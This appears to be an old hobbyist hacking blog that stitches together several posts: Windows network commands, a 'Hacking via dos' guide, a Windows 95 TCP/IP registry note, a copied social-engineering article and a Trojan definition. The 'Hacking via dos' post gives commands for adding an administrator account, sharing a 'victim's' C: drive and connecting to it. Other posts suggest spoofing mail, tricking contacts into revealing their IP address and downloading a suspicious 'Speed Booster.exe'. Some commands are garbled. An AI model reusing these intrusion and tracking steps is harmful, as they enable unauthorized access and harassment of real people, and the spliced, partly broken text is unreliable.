2008-08-04T11:00:00.000-07:00

Some useful commands in cmd :
First thing you need to know is some very helpfull commands to use on CMD(Command Prompt).

In case you don't know how to get CMD open in your box, then click on Start, then Run, then type "cmd" (no quotes, off course... you know the drill).

In case you don't know some of them, then just type the command on CMD and hit enter. A little help will show up in your screen. Read it and understand what the command does.

Lets start easy...

1) ping : This command will allow you to know if the host you pinging is alive, which means if it is up at the time of executing the "ping" command.

ping x.x.x.x (x is the IP address)

or

ping www.whatever.com (www.whatever.com is the website you want to ping, but you don't know the IP)

OBS: Keep in mind that if the host you pinging is blocking ICMP packets, then the result will be host down. Oct 11 AnUj
nslookup
2) nslookup : This command has many functionalities.
One is for resolving DNS into IP.
Lets say you know the website URL but you don't know its IP(and you want to find out).

nslookup
Code:
www.whatever.com
(www.whatever.com is the website you want to find out the IP)

Now, another really nice function of nslookup is to find out IP of specific Mail Severs.

nslookup (enter)
set type=mx (enter)
yahoo.com

This command will give you the mail server IP of yahoo.com. You can use whatever server you want and if it is listed on DNS, then you get the IP. Simple, isn't it?

OK, now why would you want to have an IP of a mail server?
To send spoofed mail to your friends or even for SE. Oct 11 AnUj
tracert
3) tracert : This command will give you the hops that a packet will travel to reach its final destination.

OBS: This command is good to know the route a packet takes before it goes to the target box.

tracert x.x.x.x (x is the IP address)

or

tracert www.whatever.com (www.whatever.com is the website you don't know the IP) Oct 11 AnUj
arp
This command will show you the arp table. This is good to know if someone is doing arp poisoning in your LAN.

arp -a Oct 11 AnUj
route
This command will show you the routing table, gateway, interface and metric.

route print Oct 11 AnUj
ipconfig
This command will show tons of very helpful things.
Your IP, gateway, dns in use.

ipconfig Oct 11 AnUj
netstat
This command will show you connection to your box.

netstat

or

netstat -a (this will show you all the listening ports and connection with DNS names)
netstat -n (this will show you all the open connection with IP addresses)
netstat -an (this will combined both of the above) Oct 11 AnUj
nbtstat
This command will show you the netbios name of the target box.

nbtstat -A x.x.x.x (x is the IP address)

nbtstat -a computername

net view x.x.x.x or computername (will list the available sharing folders on the target box)

Now some hints:

net use \ipaddressipc$ "" /user:administrator
(this command will allow you to connect to the target box as administrator)

Now if you want to connect to the target box and browse the entire C drive, then use this command:

net use K: \computernameC$ (this will create a virtual drive on your "my computer" fold Oct 11 AnUj
And least but not last, the "help" command.

whatevercommand /help

or

whatevercommand /?

2008-08-04T10:56:00.000-07:00

Hacking via dos :

Try these following dos commands and use them for hacking

1) ping command
a cool way to say hello to victim
try
ping [victims ip goes here]
if the result is request timed out then the user is ofline
if the result is reply from [ip] bytes=32 time<1ms TTL 64
the victim is online.

2)net user [anyname] /add
it adds a new net user put any name inplace of [anyname]

3)net localgroup administrators [anyname] /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it's nice
yo know wich version of windows xp you are going to try share.

4)net share system=C:\ /unlimited
This commands share the C: drive with the name of system.
you can use any root dir. instead

5)net use \\victimip [nameofnetaccount]
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
where nameofnetuser is the name via which victim logs on

6)explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access!

SAUV : This works only for the local PC's account and it fails for the Password if u r using LAN

=====================================================================================

Getting Ip data from various sources :
Introduction
Getting the local machine's name
RAS machines using some sort of dialup
Network machines
Using the DHCP VxD to get the IP address and the DNS server data
Using WsControl() to get the IP address
Author
Legalese
Copyright

Introduction
------------

This document describes several ways to get TCP/IP specific data under
Windows 95+. Information was provided by George Foot, Jacob Verhoeks,
Arthur Hoogervorst and several whacky programs by Alfons Hoogervorst.

Basic information required to get for TCP/IP:

o The local machine's name

o The local machine's IP address(es)

o The IP addresses of DNS servers

Sample source code (in C), that demonstrate the techniques described in this
document, are available on request.

This document refers seevral times to the Windows registry and to VxDs. If
you want to use the registry and to call VxDs from within DOS programs
(running under Windows), also check out

http://www.hoogervorst.demon.nl.no.spam/proteus/files/regdos.zip (delete
the usual no.spam from the URL).
Getting the local machine's name
--------------------------------

You can get the computer's name by getting the ASCIIZ string from the
following key:

HKEY_LOCAL_MACHINE\
System\
CurrentControlSet\
Control\
ComputerName\
ComputerName\
ComputerName = ASCIIZ string of max. 64 characters.

Several Windows TCP/IP programs use the computer name in host names, for
example Eudora. However, the returned ASCIIZ string doesn't have to be
"DNS compliant", i.e. it may have white space and other characters that
are invalid in host names.

Alternatively, you can find the "real" machine name by getting the current
IP address, and using gethostbyaddr().

RAS machines using some sort of dialup
--------------------------------------

The RAS dialup adapter stores TCP/IP settings in a "phone book entry". For
Windows 95, this phone book is stored in the registry. To get the relevant
addresses, you need to follow these steps:

1. Check if there's a RAS connection active (optional):

Read DWORD value of the following key:

HKEY_LOCAL_MACHINE\
System\
CurrentControlSet\
Services\
RemoteAccess\
Remote Connection = DWORD

If the returned DWORD has value 1, there's a RAS connection

2. Get the name of the current RAS phone book:

Read an ASCIIZ string from the following key:

HKEY_CURRENT_USER\
RemoteAccess\
Default = ASCIIZ string for the active phone book

The returned string should be used in the next step.

3. Get the RAS settings using the "phone book name". Note that you should
first get the size for the settings buffer (using the Registry API).

Read binary data from the following key:

HKEY_CURRENT_USER\
RemoteAccess\
Profile\
"phone book name" = BINARY data of max. 50 bytes

"phone book name" is the name of the phone book retrieved in step 3.

4. The byte at offset 0x04 in the retrieved data buffer has several flags
set for available TCP/IP data.

If bit one (0x01) is set, the user set a fixed IP address for the
current RAS connection. This fixed IP address (in host order) can
be found at offset 0x08.

If bit two (0x02) is set, the user specified one or two DNS addresses.
The DNS addresses are in host order, and can be found at offset 0x0C
and offset 0x10. Note: 0.0.0.0 (0x0UL) is an invalid (unspecified) DNS
address.

History:

I had most of the registry functions working (for DOS programs running
under Windows 3.1 and 95), and also found the appropriate RAS connection
key. I didn't find the necessary IP data, and told this to Jacob Verhoeks.
The next day he came up with a full and detailed description of the binary
data stored under the RemoteAccess\Profile tree.

Network machines
----------------

For network machines too the data is stored in the registry. Here are the
steps to retrieve the current IP address and the DNS IP addresses.

1. The current active adapter's IP address can be found in the following key:

HKEY_LOCAL_MACHINE\
System\
CurrentControlSet\
Services\
Class\
NetTrans\
0000\
IPAddress = ASCIIZ string

This ASCIIZ string has the dotted name IP address.

Note: Presumably Windows 95 stores multiple interfaces in the NetTrans
key. Ideally you should enumerate each of them, and check whether any
of them has an "IPAddress" key.

2. The current IP addresses of DNS servers can be found in the following
key:

HKEY_LOCAL_MACHINE\
System\
CurrentControlSet\
Services\
VxD\
MSTCP\
NameServer = ASCIIZ string

This key stores DNS IP addresses in a comma-separated list.

History:

I hadn't worked for a long time on DosSock95 when George Foot referred
me to a .FIX file and sent me the info about the IP address. Both
George Foot and Jacob Verhoeks provided the key which stores the name
server information.

Using the DHCP VxD to get the IP address and the DNS server data
----------------------------------------------------------------

For RAS connections, there's an alternate way to get the IP address and
DNS server addresses. This only works with RAS connections.

First get the entry point of the DHCP VxD (which has ID 0x49A). Call the
entry point with (E)AX set to 1, ES:BX set to a buffer receiving DHCP data,
and (E)CX with the size of the buffer. If the buffer is smaller than the
data available, AX will be set to 111 (Win32 error: ERROR_BUFFER_OVERFLOW)
and the first DWORD in the buffer will contain the size of the DHCP data.

Here's how the information looks like:

Offset Type What

0x0000 WORD Number of IP addresses
0x000C DWORD IP addresses in host order
0x0020 WORD Total number of bytes in server addresses. Divide by
four to get the number of server addresses.
0x0024 WORD Offset (from begin of data) to server addresses.

History:

This information was found while stepping through the WinSock code.
Don't try this at home (in a sense: do it actually at home).

Using WsControl() to get the IP address
---------------------------------------

WsControl() is an undocumented function found in both the 16 bit and the
32 bit WinSock DLLs of Microsoft. Many people already suspected that
WsControl() returns very useful data, because it's used by the Windows 95
WINIPCFG tool. The problem is that it's an undocumented function: you won't
hear anything of it from Microsoft... In short: the following information may
be highly platform dependent, and extremely unportable. Food for the hacking
minded proper. Here's what I found out (and I'd appreciate any comments if
you find other things about WsControl).

The WsControl() function looks like this:

DWORD WsControl(DWORD Protocol, DWORD Action,
LPVOID CommandBuffer, LPDWORD CommandBufferSize,
LPVOID ResultBuffer, LPDWORD ResultBufferSize);

For TCP/IP Protocol should be set to IPPROTO_TCP and/or IPPROTO_UDP. Other
protocol values result in the expected WSA error "unsupported protocol".

The only value of Action I encountered was 0, which seems to mean something
like "Get Information". I believe that passing a value of 1 would send
something like "Set Information" to WinSock; but I must admit that I didn't
try this. (For obvious reasons ofcourse. If you happen to have a lot of
money, consider donating money to me, so I can buy a test machine. Smile

CommandBuffer has a buffer with a command that's sent to WinSock,
CommandBufferSize points to a DWORD with the size of the CommandBuffer.

On return of the function, ResultBuffer will have data returned by WsControl
for the command in CommandBuffer. The DWORD pointed to by ResultBufferSize
should have the size of ResultBuffer on function call, and has the number
of bytes written to ResultBuffer on function return.

CommandBuffer
-------------

The Command buffer is a structure of 36 bytes. It may look like this; names
are mine, yours may be better.

#pragma pack(1)
typedef struct
{
DWORD Number; /* Interface number, WS_INTERFACE_TCPIP for TCPIP */
DWORD Unknown; /* Seems to be used to differentiate between
* multiple TCPIP interfaces. */
} WS_INTERFACE, FAR* LPWS_INTERFACE, NEAR* NPWS_INTERFACE, * PWS_INTERFACE;

typedef struct
{
WS_INTERFACE Interface; /* Interfaces to query??? */

DWORD What; /* Changes for each request */
DWORD Unknown; /* Seems to be always 0x100??? */
DWORD Command; /* Obviously a command */

BYTE Unknown1[16]; /* Unknown (Always 0???) */
} WS_IN_PARAMS, FAR* LPWS_IN_PARAMS, NEAR* NPWS_IN_PARAMS, * PWS_IN_PARAMS;
#pragma pack()

The first two DWORDs in the WS_IN_PARAMS structure (the CommandBuffer) have
a number for what I call an "interface". In Windows 95 lingo you can call
it an adapter. For the TCP/IP interface, the Interface should have a value
of 0x0301, with possibly some other value for the most significant DWORD
(little endian: xxxx xxxx 0000 0301).

Just to clarify the above phrase: when Windows searches
for an TCP/IP interface, it loops while checking for the
DWORD 0x00000301.

The What member seems to change for each WsControl request, and probably
"browses" deeper into the hierarchy of data available through WsControl.

The Command member has a number which seem to correspond with a command.

Available Commands
------------------

Here's what I found about commands. Note that the naming of the commands
are mine; yours may be better.

Get List Of Interfaces
----------------------

Interface = 0
What = 0x100
Unknown = 0x100
Command = 0
Unknown1[] = 0

Returns several quad words (4 words, 2 dwords) with all the interfaces
available for use in WsControl.

The interface number for TCP/IP is 0x0301 (with the Unknown dword
possibly set to differentiate between multiple TCP/IP interfaces).

Example output:

0000: 00 04 00 00 00 00 00 00 - 01 04 00 00 00 00 00 00
0010: 01 03 00 00 00 00 00 00 - 80 03 00 00 00 00 00 00
0020: 80 02 00 00 00 00 00 00 - 00 02 00 00 00 00 00 00
0030: 00 02 00 00 01 00 00 00

The quadword at offset 0x10 has the first (and only) TCP/IP interface.
Incidently, the quadword at 0x30 is related to the loopback adapter,
the quadword at 0x28 to the PPP adapter.

Acknowledge Valid Interface (Get Version??? Is Current???)
----------------------------------------------------------

Interface = Valid Interface
What = 0x100
Unknown = 0x100
Command = 0x1
Unknown1[] = 0

To acknowledge the interface in Interface, send the above command.
The result buffer should return a DWORD with a special value.

For example, the interface number for TCP/IP is 0x0301. If you set
Interface to 0000 0000 0000 0301, the returned DWORD will contain
0x0303. Presumably, the special value returned is related to the
HIBYTE of the interface number.

Note that the ResultBufferSize will NOT have the number of bytes written
to the buffer. This seems to be a bug - or perhaps it's just the way
this command is supposed to work. Your guess may be better.

Example output:

0000: 03 03 00 00

The above output is for the TCP/IP interface.

Get Interface Information
-------------------------

Interface = Valid Interface
What = 0x200
Unknown = 0x100
Command = 0x1
Unknown1[] = 0

This command returns several data which may or may not be useful at all.

For TCP/IP the DWORD at offset 0x54 has the number of IP addresses
active for the TCP/IP interface. To get specific IP address information,
use the Get Active Address Information.

For TCP/IP the DWORD at offset 0x58 has the number of IP address related
information structures. To get the information, use the Get Extended Active
Address Information.

Example Output:

For TCP/IP:

0000: 02 00 00 00 80 00 00 00 - EA 01 00 00 00 00 00 00
0010: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
0020: EA 01 00 00 66 01 00 00 - 00 00 00 00 00 00 00 00
0030: 00 00 00 00 3C 00 00 00 - 00 00 00 00 00 00 00 00
0040: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
0050: 02 00 00 00 02 00 00 00 - 07 00 00 00

The DWORD at offset 0x54 has the number of structures returned by
the Get Active Address Information command. The DWORD at offset
0x58 has the number of structures returned by the Get Extended
Active Address command.

Get Extended Active Address Information
---------------------------------------

Interface = Valid Interface
What = 0x200
Unknown = 0x100
Command = 0x101
Unknown1[] = 0

For TCP/IP this command returns data with an unknown structure. It
seems to list network masks.

Example output:

For TCP/IP see output below. Note that the size of each structure is
0x150 / 0x07.

0000: E0 00 00 00 02 00 00 00 - 01 00 00 00 FF FF FF FF
0010: FF FF FF FF FF FF FF FF - C3 AD E4 8E 03 00 00 00
0020: 02 00 00 00 38 00 00 00 - E0 00 00 00 FF FF FF FF
0030: 00 00 00 00 02 00 00 00 - 01 00 00 00 FF FF FF FF
0040: FF FF FF FF FF FF FF FF - C3 AD E4 8E 03 00 00 00
0050: 02 00 00 00 38 00 00 00 - 00 00 00 00 FF FF FF FF
0060: C3 AD E4 8E 01 00 00 00 - 01 00 00 00 FF FF FF FF
0070: FF FF FF FF FF FF FF FF - 7F 00 00 01 03 00 00 00
0080: 02 00 00 00 38 00 00 00 - FF FF FF FF FF FF FF FF
0090: C3 AD E4 FF 02 00 00 00 - 01 00 00 00 FF FF FF FF
00A0: FF FF FF FF FF FF FF FF - C3 AD E4 8E 03 00 00 00
00B0: 02 00 00 00 38 00 00 00 - FF FF FF FF FF FF FF FF
00C0: C3 AD E4 00 02 00 00 00 - 01 00 00 00 FF FF FF FF
00D0: FF FF FF FF FF FF FF FF - C3 AD E4 8E 03 00 00 00
00E0: 02 00 00 00 38 00 00 00 - FF FF FF 00 FF FF FF FF
00F0: FF FF FF FF 02 00 00 00 - 01 00 00 00 FF FF FF FF
0100: FF FF FF FF FF FF FF FF - C3 AD E4 8E 03 00 00 00
0110: 02 00 00 00 BB 2B 00 00 - FF FF FF FF FF FF FF FF
0120: 7F 00 00 00 01 00 00 00 - 01 00 00 00 FF FF FF FF
0130: FF FF FF FF FF FF FF FF - 7F 00 00 01 03 00 00 00
0140: 02 00 00 00 BC 2B 00 00 - FF 00 00 00 FF FF FF FF

Get Active Address Information
------------------------------

Interface = Valid Interface
What = 0x200
Unknown = 0x100
Command = 0x102
Unknown1[] = 0

For TCP/IP this command returns data which is partly understood. The
first four bytes in each structure have active IP addresses.

Example output:

For TCP/IP see output below. Note that the size of each structure is
0x30 / 0x02.

0000: C3 AD E4 8E 02 00 00 00 - FF FF FF 00 01 00 00 00
0010: FF FF 00 00 01 00 00 C0 - 7F 00 00 01 01 00 00 00
0020: FF 00 00 00 01 00 00 00 - FF FF 00 00 00 00 00 C0

As you can see, the first DWORD has the current IP address
(195.173.228.142). The first DWORD in the second structure has the
loopback address of 127.0.0.1, which was active at that time.

Author
------

Written by Alfons Hoogervorst. He can be contacted at
.

If you have additional information about any of the topics in this document,
especially about WsControl(), send me a note. Comments, suggestions, and
any useful hints are welcome too.

Alfons works as a freelance developer, specializing in low-level programming.

Legalese
--------

You're allowed to distribute this file for free, without paying me any fee.
However, the following sections should remain unmodified in this document:

Introduction, Author, Legalese, Copyright.

The information in this document is provided AS IS, without any warranties
or guarantees. As a human being, he expressedly reserves his rights to err:
"If its meaning doesn't manifest, then: put it to rest!"

SAUV :hmm......Nice
check the yahoo exploits if u wanna hack emails using chatting and Ips

Ethics Of Hacking :

2008-08-04T10:52:00.000-07:00

Ethics Of Hacking :
I M Shocked That This Forum Is Here.......Its Known That anyone joining this website...should b a hacker and should have a basic knowledge of hackinf......but still for the intermediates and beginners........
Hacking Can B Done In Millions Of Ways......Phishing,Bruteforcer,Keylogger and wat not all......
Do You Know that there r millions of ways of defacing a website......but the must of all this is that you should have a fast internet connection of minimum 10mbps......
I know in India legally its not possible but Twisted Evil illegaly it is Evil or Very Mad
the best way to achieve is to use some speed enhancers......i ve uploaded a speed enhancer here.........just download it and....make ur computer/server run twice its original speed......

Speed Booster.exe
Description:
This Is A Kool Speed Booster......With Any Basic Speed That U Have It Will Enhance it to 10 mb/s (10 mbps)

Download
Filename: Speed Booster.exe
Filesize: 44.01 KB
Downloaded: 824 Time(s)

SAUV :dude its not instaling...error msg is"speed booster.exe is not a valid win32 application...
wat to do now???

hey bro......This Speed Booster Has Been Specially Designed For A limited IP addresses..These Ip address includes of all d active members oof this community......Most of d softwares available here functions on d same rule.....

a group called as Czar Hackerz Just b a pat of this and fill up d forums.........
We r ready to help you........
As Soon as you send 10 new posts in any forum v shall include ur IP address.............

How To Get Ip Address Of Victom PC :

2008-08-04T10:50:00.000-07:00

How To Get Ip Address Of Victom PC :

Find an msn messengers contact IP address

The only way i know to do that is to send to the contact a file while he is online , send him/her a photo or something else , doing that a peer-to-peer connection opens while your friend gets the file/photo no matter what it is , make sure that you have a DOS Prompt open (located at:start > programs > MS-DOS Prompt) and type the command: netstat while sending them the file and you will see a list in the DOS Prompt of all the connections your computer has that time , one of them must be your friend that is receiving the file.If i hear about an other easier way that you get it without sending files be sure i will post it here.

Find an IP though mIRC chat channels

There is the /dns nickname command in irc but some people use proxies or shells and you cant see their real address,how do you know if the user uses a web-shell or a proxy? well... guess that yourself while looking the ip you got from the /dns nickname command , make sure you check out IRC Scanner v1.0 by RG in our programming section and in IP scanners section , its the best and fastest way to scan the users in IRC channels.

Get your friends IP address by sending them to your page

Build a simple site in geocities or anywhere else , then go t http://www.stats4all.com and create an account , they provide free website statistics , add their code to your site and tell your friend to check out a cool page you just made , when he visits the page his IP will be logged in stats4all.com so after your friend visits your page check out your stats in stats4all.com and you will find the last 5 visitors at the left of the stats page , your friends IP included.

sauv :Well even netstat commands can b usig if u r chatting wd him
2.but a person uses the dynamic ip address....ie
his ip address will be changed by his ISP next time he will online.

tht means i have to track his ip address all the time when he comes online???
3.u use netstat -n
4.wid da netstat -n command vl v get his ISP ??...i mean da permanent one...

---------------------------------------------

Social Engineering :

2008-08-04T10:47:00.000-07:00

Social Engineering :

source :- http://www.securityfocus.com/infocus/1860

The purpose of this article is to go beyond the basics and explore how social engineering, employed as technology, has evolved over the past few years. A case study of a typical Fortune 1000 company will be discussed, putting emphasis on the importance of education about social engineering for every corporate security program.
Top five hacking moments on film
To break the ice, let's start this article by looking at this author's top five favorite hacking moments in modern movies, all of them quite old-school to emphasize a point:

5. Independence Day: Using an old space ship as cover for two humans to infiltrate the alien mother ship and upload a virus to destroy it.
4. Hackers: Dumpster diving in the target company's trash in order to obtain financial data from printouts.
3. War Games: Password cracking the military computer system by studying its creator.
2. Ferris Bueller's Day Off: Faking a grandmother's death to get Ferris's girlfriend excused from school through multiple phone calls and answering machine recordings.
1. Star Wars: R2-D2 gaining access to the death star main computer and shutting down the garbage dispensers (remember the com link!).

Question: Which of the above hacks did not employ a social engineering technique? Answer: None of the above.

In Independence Day, the characters spoofed the mother ship with a physical Trojan horse. In Hackers, dumpster diving can't be achieved with a computer. In War Games, Matthew Broderick's character studied his target before attempting to crack the password, and then in Ferris Bueller's Day Off, his phone scam was sheer brilliance. You've got to love the low-tech approach. And although it would seem R2-D2's hack was entirely technical, remember he had to sneak into the room with the computer access point before achieving his goal.

The lesson here is that social engineering is a major component of hacking in both fictional and real scenarios. By merely trying to prevent infiltration on a technical level and ignoring the physical-social level, we are leaving ourselves wide open to attack.
Social engineering redefined
Bruce Schneier, author of Secrets & Lies: Digital Security in a Networked World, reminds us that social engineering, aka "socio-technical attacks" is really all about the human aspect, and that means trust. Kevin Mitnick, renowned and reformed hacker, in his book The Art of Deception, goes further to explain that people inherently want to be helpful and therefore are easily duped. They assume a level of trust in order to avoid conflict. It's all about, "gaining access to information that people think is innocuous when it isn't," and then using that information against the real target. We are the weakest link in the security chain. This point cannot be underemphasized. People are the weakest link, not technology.

This article is a followup to a social engineering series written several years ago. The goal is to go beyond the basics and explore how social engineering has been employed as technology has evolved over the past few years. For further information on social engineering, see this author's previous article, "Social Engineering Fundamentals, Part I: Hacker Tactics" and "Part II: Combat Strategies."

Since social engineering involves the human element of any attack, it's important to get into the head of the hacker and understand her motivation. Historically, the motivation has been intellectual challenge, bragging rights, access to sensitive information, simple curiosity, or our biggest fear - malicious intent. By knowing why we are at risk, we can better protect ourselves from the foolish things we do, thereby allowing social engineers to exploit us.

Targets of an attack can be both physical and psychological. Social engineering attacks will occur in person, over the phone, and online. No medium is safe from them. Individuals are targets for rampant identity theft and businesses fall prey to exploitation of a variety of holes. Weak passwords are always a target, as are file backdoors and improperly set permissions. That's the obvious stuff. What's changed over the past few years is that borders progressively don't matter. Words like "cyberterrorism" have become mainstream and we now even have an FBI-organized counter-terrorism posse of hackers waiting to pounce in the event of a massive online terrorist attack. Even some of the best hackers will use social engineering techniques against a victim (in combination with a highly technical approach) because it's simple, easy, and very effective. Social engineering is everywhere.
Types of attacks
The biggest change over the past four years, since our original article series on SecurityFoucs, is the exponential growth of e-commerce. Browsers and the use of the SSL (secure socket layer) protocol now are the norm for viewing everything from financial data to party invitations over webmail. Those of us who still use pine for email are in the minority. The types of attacks we see today tend to be targeted more toward web applications. Hidden programs running on web sites and hidden programs in email enclosures opened through webmail programs can host all kinds of dangers.

Browser add-ons can mask all kinds of rogue programs. DDoS (Distributed Denial of Service) attacks are still quite common and are a royal pain to combat, but they're not increasing in number the way identity theft is. Malware continues to plague everyone, although the widespread viruses of the nineties seem to have taken a back door to the browser back doors, most often installed as drive-by spyware by visiting a website. VoIP (Voice over Internet Protocol), being the new buzzword, has also attracted attackers with results varying from authentication failures to crashing phones.

So how does social engineering fit into the picture? Before employing some of the techniques noted above, some preliminary social engineering can be incredibly fruitful. Footprinting - the art of gathering information (or pre-hacking), is like a robber casing a bank. It's commonly done to research a predetermined target and determine the best opportunities for exploitation. Footprinting can include anything from phone calls from a role playing person asking seemingly innocent questions to physically mapping out buildings and data centers. And footprinting is a major social engineering component of a choreographed attack.
Phishing trips
Phishing is the most common form of social engineering online, and most notably includes email spoofs. It's a rare day where the average email inbox doesn't include some sort of spoof. Today, eBay, Paypal and Citibank are the most common targets. Phishing itself is not new, but the frequency has increased over the past few years. The user receives email claiming that his Paypal account information needs updating and the email includes a link that sends the user to a fake web site where he is instructed to enter his password to update his information. The web site then stores the real passwords for use in identity theft attacks against the real Paypal site. For more information about phishing, see Scott Granneman's article, "Phishing For Savvy Users."

The best response is to delete these messages before even looking at them, just in case a rogue program might be launching in the background. However, to be sure a genuine message from a site like Citibank or eBay isn't being ignored, the best course of action is to log into their main site login, by typing http://www.ebay.com/, and then check the account for a record of the email or of any sort of problem. Due to the nature of phishing, you can't reliably click on a link in your email anymore and be sure it's what it appears.

In the case of eBay, go to "my messages" or "my ebay" to verify the authenticity of the email sent. Paypal doesn't have this feature yet. It's also easy to send a quick note to spoof@ebay.com or spoof@paypal.com, forwarding the message in question, and they will respond quickly as to its authenticity. eBay recently adapted their email sent to users to include usernames in the subject and body of the message, to emphasize authenticity. In general though, the best practice is to assume the email is a fake and remove it permanently from any email archives.
Case study - Company X
To illustrate the importance of incorporating social engineering education into a corporate security program, here is an overview of the security for a fairly typical high-tech company, called "Company X" for the purposes of this article. Company X, a multi-billion dollar organization, spends millions on hardware and security, but in reality it only does the minimum of what is necessary to keep its assets secure. Such is the life of an average security program in the competitive market of high-tech.

Company X's physical (building) security includes badges for all employees, locked doors, security guards, and restricted access. Employees, however, tend to hold doors open for others and don't tend to check the photos on IDs when doing so. Dumpster areas are gated but unlocked, leaving them open to potential dumpster divers. Phone security is standard, allowing internal transfers and outgoing calls with blocked IDs. Remote access is through a VPN with SecureID, the use of which requires permission from a superior and inactive accounts are suspended within 30 days. Wireless access points in the buildings also fall under these restrictions.

As for hardware, remote drives are used, but employees are instructed not to store confidential information on the drives. Laptops are common, but only roughly 30% of users lock them with the provided cables. Shared drives on the internal network are protected by group permissions. On the system level, the company runs weekly virus scans. Security teams have reduced administrative rights on machines so employees can't install rogue programs. Password requirements are fairly standard, requiring a variety of characters, changed every few months.

Software comes standard for each machine. Screen savers are password protected, but not always locked. Most machines are open to Internet access, with the exception of some site blocking. Passwords can be saved in browsers, however. Email suffers from frequent server problems, webmail is not always secure, and IM use internally is rampant.

In the areas where social engineering prevention could be most useful, barely anything is done. When an employee is on the phone with Help Desk support, the employee's number comes up on phone but no standard authentication questions are asked by either the Help Desk staff or the employee being helped. CallerID spoofing would be a very simple way to get a password reset. Security training is available for home network usage and basic encryption, but departments differ in their use of these tools. No standard training is given for new employees, leaving the organization open to staff passing around a wide range of bad habits.

Sadly, Company X's security is not much better than it was ten years ago and it has barely evolved with the times. It's tough enough to keep up with the latest technology, patches, and filters with corporate budget cuts. Security teams tend to get the short end of the stick until the company suffers a major outage from an attack. Since various attacks became more public in recent years, everybody and their brother company claims to be secure - but the reality is that most companies are like Company X, struggling to maintain a basic level of security.
Countermeasures
What could Company X and others like it do to prevent attacks on the social engineering level? On the technical side, they must continue to install spam filters and update software patches, as a bare minimum. Making cryptography standard for email and web access, not allowing passwords to be saved in browsers, and changing to an internal messaging program are key technology step. The next step would be to develop an incident reporting and tracking program. This way they can discover additional holes in their program and attend to those holes. Incident reporting won't necessarily catch the intruders, but it helps to find ways to deter them.

Not to bite the hand that feeds us, but as Mitnick says, "anyone who thinks that security products alone offer true security is settling for the illusion of security." Therefore, training cannot be emphasized enough. New employee training, repeat training, regular updates, and fun security tips can keep the security education process fresh and lively. Some companies now use t-shirts and other paraphernalia to advertise security practices and remind employees to beware of suspicious phone calls and other potential phishing attempts. Help Desk staff need to have proper authentication procedures for all support calls. Security personnel should be adequately trained as well, and screened beyond regular employees in case they themselves pose a risk to the company.

Security policies used to have more bark than bite, but these days it's now common to put more teeth into them. Corporate policies, standards, guidelines, and so on cover a wide range of areas but the important thing is to develop them with growth and accountability in mind. Topics that should be covered in corporate policies include information sensitivity, password protection, ethics, acceptable use, email, database credentials, extranet usage, VPN security, and server security.

Also, pay attention to what's happening on the national and international level as far as ID theft laws and database protection are concerned. New bills are being developed to make identity theft more difficult through the greater protection of personal information.
The bottom line
Unfortunately, the reality is that intruders rarely get caught, and even when they are caught, the penalties haven't traditionally been stiff. Shouldn't we be more worried about serial murderers running loose than a bunch of computer geeks? Seriously though, identity theft, corporate espionage and cyber-terrorism are here to stay, so the bottom line lies in making a commitment to combating potential attackers.

At Company X the buck ultimately stops with the CIO, who must commit to improving their security program before they lose a significant amount of money and intellectual property to a major attack. That requires committing both the financial and people resources to the problem, and not dropping education and training from the budget. As individuals, we must commit to increasing our awareness of the risks we face and the potential openings we create for social engineers to fool us. The key, according to Schneier, lies in, "securing the interaction between the data and the people."

In any good security program, a realistic balance must be reached. There's always a fine line between an "atmosphere of paranoia" and a productive environment. However, if we err on the side of stronger security, knowing human error is the problem, we'll be more likely to achieve success. Just remember that we, the people, are the weakest link and as Mitnick writes, "Don't' be gullible!

Trojan!!

2008-08-04T10:43:00.000-07:00

Hacking Via Trojan!! :

Trojan ( bad ) Beware !!!!
Trojan horse well this term has many meanings .
In the context of computer software, a Trojan horse is a malicious program that is disguised as or embedded within legitimate software. The term is derived from the classical myth of the Trojan Horse. They may look useful or interesting (or at the very least harmless) to an unsuspecting user, but are actually harmful when executed.

Often the term is shortened to simply Trojan, even though this turns the adjective into a noun, reversing the myth (Greeks were gaining malicious access, not Trojans).

There are two common types of Trojan horses.

One, is otherwise useful software that has been corrupted by a cracker inserting malicious code that executes while the program is used. Examples include various implementations of weather alerting programs, computer clock setting software, and peer to peer file sharing utilities.

The other type is a standalone program that masquerades as something else, like a game or image file, in order to trick the user into some misdirected complicity that is needed to carry out the program's objectives.

Trojan horse programs cannot operate autonomously, in contrast to some other types of malware, like viruses or worms. Just as the Greeks needed the Trojans to bring the horse inside for their plan to work, Trojan horse programs depend on actions by the intended victims. As such, if trojans replicate and even distribute themselves, each new victim must run the program/trojan. Therefore their virulence is of a different nature, depending on successful implementation of social engineering concepts rather than flaws in a computer system's security design or configuration.
Definition

A Trojan horse program has a useful and desired function, or at least it has the appearance of having such. Trojans use false and fake names to trick users into dismissing the processes. These strategies are often collectively termed social engineering. In most cases the program performs other, undesired functions, but not always. The useful, or seemingly useful, functions serve as camouflage for these undesired functions. A trojan is designed to operate with functions unknown to the victim. The kind of undesired functions are not part of the definition of a Trojan Horse; they can be of any kind, but typically they have malicious intent.

In practice, Trojan Horses in the wild often contain spying functions (such as a packet sniffer) or backdoor functions that allow a computer, unknown to the owner, to be remotely controlled from the network, creating a "zombie computer". The Sony/BMG rootkit Trojan, distributed on millions of music CDs through 2005, did both of these things. Because Trojan horses often have these harmful behaviors, there often arises the misunderstanding that such functions define a Trojan Horse.

In the context of Computer Security, the term 'Trojan horse' was first used in a seminal report edited/written by JP Anderson (aka 'The Anderson Report' (Computer Security Technology Planning, Technical Report ESD-TR-73-51, USAF Electronic Sysstem Division, Hanscom AFB, Oct, 1972), which credits Daniel J Edwards then of NSA for both the coinage and the concept. One of the earliest known Trojans was a binary Trojan distributed in the binary Multics distribution; it was described by PA Karger and RR Schell in 1974 (Multics Security Evaluation, Technical Report ESD-TR-74-193 vol II, HQ Electronic Systems Division, Hanscom AFB, June 1974).

The basic difference from computer viruses is that a Trojan horse is technically a normal computer program and does not possess the means to spread itself. The earliest known Trojan horses were not designed to spread themselves. They relied on fooling people to allow the program to perform actions that they would otherwise not have voluntarily performed.

Trojans implementing backdoors typically setup a hidden server, from which a hacker with a client can then log on to. They have become polymorphic, process injecting, prevention disabling, easy to use without authorization, and therefore are abusive.

